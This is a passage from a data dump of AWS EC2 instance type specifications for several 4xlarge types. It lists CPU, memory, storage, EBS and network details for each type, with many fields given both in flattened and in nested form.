4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 160, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.4xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 160, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 400, 'Disks': [{'SizeInGB': 400, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 400, 'Disks': [{'SizeInGB': 400, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 124928, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 124928}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 16000}, 'NvmeSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': 